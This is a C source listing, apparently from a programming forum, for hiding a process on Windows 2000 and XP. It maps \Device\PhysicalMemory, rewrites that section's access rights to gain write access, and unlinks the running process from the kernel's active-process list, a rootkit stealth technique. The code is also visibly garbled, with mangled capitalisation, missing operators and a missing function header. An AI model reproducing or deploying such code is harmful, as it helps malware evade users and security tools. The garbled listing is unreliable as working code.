Under 2000 and XP, hidden processes, VC6.0 test

//// hide process # include #include #include

#define nt_success (status) (status)> = 0) #define status_info_length_mismatch ((ntstatus) 0xc000000004L) #define status_access_denied ((ntstatus) 0xc0000022L)

TypedEf long NTSTATUS;

Typedef struct _io_status_block {ntstatus status; ulong information;}} }_status_block, * PIO_STATUS_BLOCK

Typedef struct _unicode_string {ushort length; ushort maximumlength; pwstr buffer;} unicode_string, * punicode_string;

#define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L # define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

TypeDef NTSTATUS (Callback * ZWopense) (In POBJECT_ATTRIBUTES OBJECTATTRIBUTES);

TypedEf void (Callback * RTLinitUnicodeString) (In Out Punicode_String DestinationString, In Pcwstr SourceString);

RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; // ------------------------ -------------------------------------------------- -BOOL initddll () {g_hntdll = loadingLibrary ("ntdll.dll");

IF (null == g_hntdll) Return False; RTLINITUNICODESTRING = (RTLINITUNICODESTRING) GETPROCADDRESS (g_hntdll,

"RTLinitUnicodestring"); zwopense = (zwopensection) getProcaddress (g_hntdll, "zwopensection");

Return True;} // -------------------------------------------- ------------------------------- void closentdll () {if (null! = G_hntdll) Freelibrary (g_hntdll);

G_HNTDLL = NULL;} // ------------------------------------------- ------------------------------- void setphyscialmemorysectioncanbewrite {pacl pdacl = null; psecurity_descriptor psd = null; PACL PNewdacl = NULL; DWORD DWRES = GetSecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION, NULL,

NULL, & PDACL, NULL, & PSD;

IF (Error_Success! = dwres) {

IF (PSD) LocalFree (PSD); if (PNewDACL) localfree (pnewdacl);

EXPLICIT_ACCESS ea; RtlZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee .ptstrname = "current_user";

DWRES = STENTRIESINACL (1, & EA, PDACL, & PNEWDACL); if (Error_Success! = DWRES) {

IF (PSD) Localfree (PSD); if (PNewDACL) Localfree (PNewDACL);} dwres = setsecurityInfo

(HSECTION, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, PNEWDACL, NULL); IF (Error_Success! = DWRES) {

IF (PSD) LocalFree (PSD); if (PNewDACL) localfree (pnewdacl);

} // ----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

g_osvi.dwosversioninfosize = sizeof (OsversionInfo); GetversionEx;

IF (5! = g_osvi.dwmajorversion) Return NULL;

Switch (g_osvi.dwminorversion) {case 0: phydirectory = 0x30000; Break; // 2k case 1: phydirectory = 0x39000; Break; // XP default: return null;}

RTLinitunicodeString (& PhysmemString, L "// device // physicalmemory);

attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL;

Status = zwopensection (& g_hmpm, section_map_read | section_map_write, & attributes);

if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes);}

IF (! NT_Success (status)) Return NULL;

g_pmapphysicalmemory = mappviewoffile (g_hmpm, file_map_read | file_map_write, 0, phydirectory,

0x1000);

IF (g_pmapphysicalmemory == null) Return NULL;

Return g_hmpm;} // ---------------------------------------------------------------------------------------- ------------------------------ pvoid lineartophys (pulong baseaddress, pvoid addr) {ulong vaddr = (ulong) Addr, pgde , PTE, Paddr; PGDE = BaseAddress [VADDR >> 22]; if (0 == (PGDE & 1)) Return 0;

Ulong TMP = PGDE & 0x00000080;

IF (0! = TMP) {paddr = (pgde & 0xffc00000) (VADDR & 0x003FFFFF);} else {pgde = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000); PTE = ((Pulong) ) PGDE) [(VADDR & 0x003FF000) >> 12]; if (0 == (PTE & 1)) RETURN 0;

Paddr = (PTE & 0xFFFFFFFFFFF); UnmapViewOffile ((pvoid) pgde);}

Return (Pvoid) Paddr;} // ----------------------------------------- -------------------------------- Ulong getData (pvoid addr) {ulong phys = (ulong) lineartophys ((( Pulong) g_pmapphysicalmemory, (pvoid) addr; pulong TMP = (pulong) MapViewOffile (g_hmpm, file_map_read | file_map_write, 0, phys &

0xfffff000, 0x1000); if (0 == TMP) Return 0;

Ulong Ret = TMP [(Phys & 0xFFF) >> 2]; UnmapViewOffile (TMP);

Return Ret;} // -------------------------------------------- ----------------------------- Bool setData (pvoid addr, ulong data) {ulong phys = (ulong) lineartophys Pulong) g_pmapphysicalmemory, (pvoid) addr; pulong TMP = (pulong) MapViewOffile (g_hmpm, file_map_write, 0, phys & 0xffff000, 0x1000);

IF (0 == TMP) Return False;

TMP [(PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP);

Return True;} // -------------------------------------------- ------------------------------ long __stdcall exec (struct _exception_pointers * tmp) {EXITPROCESS (0); Return 1;} / / -------------------------------------------------------------------------------------------- --------------------------- Bool YHideProcess () {// setunhandledExceptionFilter (exec); if (false == initntdll () Return False ;

IF (0 == OpenPhysicalMemory ()) Return False;

Ulong thread = getdata (pvoid) 0xffdff124); // kteb ulong process = getData (pvoid (thread 0x44)); // kpeb

Ulong FW, BW; if (0 == g_osvi.dwminorversion) {fw = getdata (pvoid (Process 0xA0)); bw = getData (PVOID (Process 0xA4));}

IF (1 == g_osvi.dwminorversion) {FW = getData (PVOID (Process 0x88)); bw = getData (PVOID (Process 0x8c));} setData (PVOID (FW 4), BW); setData (PVOID (BW), FW);

CloseHandle (G_HMPM); Closentdll ();

Return True;}

Bool hideprocess () {static bool b_hide = false; if (! B_hide) {b_hide = true; yhideprocess (); return true;} return true;}